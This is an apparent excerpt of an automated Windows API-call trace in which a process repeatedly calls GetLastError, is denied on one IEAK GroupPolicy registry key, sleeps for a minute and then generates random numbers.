	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.559] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.560] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.561] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.562] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] GetLastError () returned 0x6
	[0103.563] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf023f, lpSecurityAttributes=0x0, phkResult=0x29afd8c, lpdwDisposition=0x0 | out: phkResult=0x29afd8c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0103.564] Sleep (dwMilliseconds=0xea60) 
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.602] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.603] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.604] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.605] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.605] GetLastError () returned 0x6
	[0113.605] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.606] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] GetLastError () returned 0x6
	[0113.607] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.607] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] GetLastError () returned 0x6
	[0113.608] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.609] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] GetLastError () returned 0x6
	[0113.610] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.611] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
